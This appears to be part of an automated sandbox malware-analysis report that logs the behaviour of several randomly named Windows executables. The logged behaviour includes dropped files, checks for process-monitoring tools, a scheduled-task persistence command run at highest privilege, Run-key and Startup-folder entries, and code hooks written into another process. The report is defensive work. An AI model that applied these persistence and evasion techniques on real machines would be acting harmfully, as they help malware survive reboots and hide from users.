Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: Regmonclass Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Stores files to the Windows start menu directory
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Memory written: PID: 5776 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Memory written: PID: 5776 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_004195E0
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
